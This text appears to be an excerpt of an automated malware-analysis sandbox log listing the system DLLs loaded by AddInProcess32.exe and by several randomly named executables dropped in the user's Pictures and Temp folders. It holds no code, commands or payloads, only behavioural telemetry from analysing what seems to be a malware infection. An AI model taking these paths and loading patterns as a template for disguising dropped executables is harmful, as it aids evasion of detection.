                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: urlmon.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iertutil.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: srvcli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: netutils.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: windows.staterepositoryps.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wintypes.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: appresolver.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: bcp47langs.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: slc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: userenv.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: sppc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: onecorecommonproxystub.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeSection loaded: winhttp.dll
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeSection loaded: msasn1.dll
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeSection loaded: profapi.dll
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeSection loaded: wldp.dll
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeSection loaded: webio.dll
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeSection loaded: mswsock.dll
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeSection loaded: winnsi.dll
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeSection loaded: dnsapi.dll
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeSection loaded: rasadhlp.dll
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeSection loaded: fwpuclnt.dll
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeSection loaded: schannel.dll
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeSection loaded: mskeyprotect.dll
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeSection loaded: ntasn1.dll
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeSection loaded: ncrypt.dll
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeSection loaded: ncryptsslp.dll
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeSection loaded: gpapi.dll
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeSection loaded: dpapi.dll
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeSection loaded: userenv.dll
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeSection loaded: propsys.dll
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeSection loaded: dwmapi.dll
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeSection loaded: oleacc.dll
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeSection loaded: version.dll
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeSection loaded: shfolder.dll
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeSection loaded: wldp.dll
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeSection loaded: wininet.dll
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeSection loaded: profapi.dll
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeSection loaded: winhttp.dll
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeSection loaded: mswsock.dll
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeSection loaded: winnsi.dll
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeSection loaded: netutils.dll
                  Source: C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exeSection loaded: userenv.dll
                  Source: C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exeSection loaded: propsys.dll
                  Source: C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exeSection loaded: dwmapi.dll
                  Source: C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exeSection loaded: oleacc.dll
                  Source: C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exeSection loaded: version.dll
                  Source: C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exeSection loaded: shfolder.dll
                  Source: C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exeSection loaded: wldp.dll
                  Source: C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exeSection loaded: textshaping.dll
                  Source: C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exeSection loaded: textinputframework.dll
                  Source: C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exeSection loaded: coreuicomponents.dll
                  Source: C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exeSection loaded: coremessaging.dll
                  Source: C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exeSection loaded: ntmarta.dll
                  Source: C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: msimg32.dll
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: msvcr100.dll
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: wininet.dll
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: rstrtmgr.dll
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: ncrypt.dll
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: ntasn1.dll
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: winhttp.dll
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: netutils.dll
                  Source: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exeSection loaded: msimg32.dll
                  Source: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exeSection loaded: msvcr100.dll
                  Source: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exeSection loaded: winmm.dll
                  Source: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exeSection loaded: powrprof.dll
                  Source: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exeSection loaded: umpdc.dll
                  Source: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exeSection loaded: wtsapi32.dll
                  Source: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exeSection loaded: winsta.dll
                  Source: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exeSection loaded: sxs.dll
                  Source: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exeSection loaded: amsi.dll
                  Source: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exeSection loaded: userenv.dll
                  Source: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exeSection loaded: profapi.dll
                  Source: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exeSection loaded: version.dll
                  Source: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeSection loaded: msimg32.dll
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeSection loaded: msvcr100.dll
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeSection loaded: winmm.dll
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeSection loaded: powrprof.dll
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeSection loaded: umpdc.dll
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeSection loaded: wtsapi32.dll
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeSection loaded: winsta.dll
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeSection loaded: sxs.dll
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeSection loaded: amsi.dll
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeSection loaded: userenv.dll
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeSection loaded: profapi.dll
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeSection loaded: version.dll
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeSection loaded: netapi32.dll
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeSection loaded: samcli.dll
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeSection loaded: samlib.dll
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeSection loaded: netutils.dll
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exeSection loaded: msimg32.dll
                  Source: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exeSection loaded: msvcr100.dll
                  Source: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exeSection loaded: winmm.dll
                  Source: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exeSection loaded: powrprof.dll
                  Source: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exeSection loaded: umpdc.dll
                  Source: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exeSection loaded: wtsapi32.dll
                  Source: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exeSection loaded: winsta.dll
                  Source: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exeSection loaded: sxs.dll
                  Source: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exeSection loaded: amsi.dll
                  Source: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exeSection loaded: userenv.dll
                  Source: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exeSection loaded: profapi.dll
                  Source: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exeSection loaded: version.dll
                  Source: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\Pictures\BTnjKpTBDzKtQo69b5SrwYDx.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\Pictures\BTnjKpTBDzKtQo69b5SrwYDx.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\Pictures\BTnjKpTBDzKtQo69b5SrwYDx.exeSection loaded: userenv.dll
                  Source: C:\Users\user\Pictures\BTnjKpTBDzKtQo69b5SrwYDx.exeSection loaded: propsys.dll
                  Source: C:\Users\user\Pictures\BTnjKpTBDzKtQo69b5SrwYDx.exeSection loaded: dwmapi.dll
                  Source: C:\Users\user\Pictures\BTnjKpTBDzKtQo69b5SrwYDx.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\Pictures\BTnjKpTBDzKtQo69b5SrwYDx.exeSection loaded: oleacc.dll
                  Source: C:\Users\user\Pictures\BTnjKpTBDzKtQo69b5SrwYDx.exeSection loaded: version.dll
                  Source: C:\Users\user\Pictures\BTnjKpTBDzKtQo69b5SrwYDx.exeSection loaded: shfolder.dll
                  Source: C:\Users\user\Pictures\BTnjKpTBDzKtQo69b5SrwYDx.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\Pictures\BTnjKpTBDzKtQo69b5SrwYDx.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\Pictures\BTnjKpTBDzKtQo69b5SrwYDx.exeSection loaded: wldp.dll
                  Source: C:\Users\user\Pictures\BTnjKpTBDzKtQo69b5SrwYDx.exeSection loaded: textshaping.dll
                  Source: C:\Users\user\Pictures\BTnjKpTBDzKtQo69b5SrwYDx.exeSection loaded: textinputframework.dll
                  Source: C:\Users\user\Pictures\BTnjKpTBDzKtQo69b5SrwYDx.exeSection loaded: coreuicomponents.dll
                  Source: C:\Users\user\Pictures\BTnjKpTBDzKtQo69b5SrwYDx.exeSection loaded: coremessaging.dll
                  Source: C:\Users\user\Pictures\BTnjKpTBDzKtQo69b5SrwYDx.exeSection loaded: ntmarta.dll
                  Source: C:\Users\user\Pictures\BTnjKpTBDzKtQo69b5SrwYDx.exeSection loaded: coremessaging.dll
                  Source: C:\Users\user\Pictures\BTnjKpTBDzKtQo69b5SrwYDx.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\Pictures\BTnjKpTBDzKtQo69b5SrwYDx.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\Pictures\BTnjKpTBDzKtQo69b5SrwYDx.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exeSection loaded: msimg32.dll
                  Source: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exeSection loaded: msvcr100.dll
                  Source: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exeSection loaded: winmm.dll
                  Source: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exeSection loaded: powrprof.dll
                  Source: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exeSection loaded: umpdc.dll
                  Source: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exeSection loaded: wtsapi32.dll
                  Source: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exeSection loaded: winsta.dll
                  Source: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exeSection loaded: sxs.dll
                  Source: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exeSection loaded: amsi.dll
                  Source: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exeSection loaded: userenv.dll
                  Source: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exeSection loaded: profapi.dll
                  Source: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exeSection loaded: version.dll
                  Source: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\Pictures\nxFajWDYSB3pQQxmrqt3pD1T.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\Pictures\nxFajWDYSB3pQQxmrqt3pD1T.exeSection loaded: winhttp.dll
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exeSection loaded: mstask.dll
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exeSection loaded: mpr.dll
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exeSection loaded: ntmarta.dll
                  Source: C:\Users\user\Pictures\yq7sRYx0zxf2nUHNI8myIvQb.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\Pictures\yq7sRYx0zxf2nUHNI8myIvQb.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\Pictures\yq7sRYx0zxf2nUHNI8myIvQb.exeSection loaded: userenv.dll
                  Source: C:\Users\user\Pictures\yq7sRYx0zxf2nUHNI8myIvQb.exeSection loaded: propsys.dll
                  Source: C:\Users\user\Pictures\yq7sRYx0zxf2nUHNI8myIvQb.exeSection loaded: dwmapi.dll
                  Source: C:\Users\user\Pictures\yq7sRYx0zxf2nUHNI8myIvQb.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\Pictures\yq7sRYx0zxf2nUHNI8myIvQb.exeSection loaded: oleacc.dll
                  Source: C:\Users\user\Pictures\yq7sRYx0zxf2nUHNI8myIvQb.exeSection loaded: version.dll
                  Source: C:\Users\user\Pictures\yq7sRYx0zxf2nUHNI8myIvQb.exeSection loaded: shfolder.dll
                  Source: C:\Users\user\Pictures\yq7sRYx0zxf2nUHNI8myIvQb.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\Pictures\yq7sRYx0zxf2nUHNI8myIvQb.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\Pictures\yq7sRYx0zxf2nUHNI8myIvQb.exeSection loaded: wldp.dll
                  Source: C:\Users\user\Pictures\yq7sRYx0zxf2nUHNI8myIvQb.exeSection loaded: textshaping.dll
                  Source: C:\Users\user\Pictures\yq7sRYx0zxf2nUHNI8myIvQb.exeSection loaded: textinputframework.dll
                  Source: C:\Users\user\Pictures\yq7sRYx0zxf2nUHNI8myIvQb.exeSection loaded: coreuicomponents.dll
                  Source: C:\Users\user\Pictures\yq7sRYx0zxf2nUHNI8myIvQb.exeSection loaded: coremessaging.dll
                  Source: C:\Users\user\Pictures\yq7sRYx0zxf2nUHNI8myIvQb.exeSection loaded: ntmarta.dll
                  Source: C:\Users\user\Pictures\yq7sRYx0zxf2nUHNI8myIvQb.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\Pictures\yq7sRYx0zxf2nUHNI8myIvQb.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\Pictures\yq7sRYx0zxf2nUHNI8myIvQb.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\Pictures\yzAPe25HGnxqbkafYprXvqQ2.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\Pictures\yzAPe25HGnxqbkafYprXvqQ2.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\Pictures\yzAPe25HGnxqbkafYprXvqQ2.exeSection loaded: userenv.dll
                  Source: C:\Users\user\Pictures\yzAPe25HGnxqbkafYprXvqQ2.exeSection loaded: propsys.dll
                  Source: C:\Users\user\Pictures\yzAPe25HGnxqbkafYprXvqQ2.exeSection loaded: dwmapi.dll
                  Source: C:\Users\user\Pictures\yzAPe25HGnxqbkafYprXvqQ2.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\Pictures\yzAPe25HGnxqbkafYprXvqQ2.exeSection loaded: oleacc.dll
                  Source: C:\Users\user\Pictures\yzAPe25HGnxqbkafYprXvqQ2.exeSection loaded: version.dll
                  Source: C:\Users\user\Pictures\yzAPe25HGnxqbkafYprXvqQ2.exeSection loaded: shfolder.dll
                  Source: C:\Users\user\Pictures\yzAPe25HGnxqbkafYprXvqQ2.exeSection loaded: kernel.appcore.dll
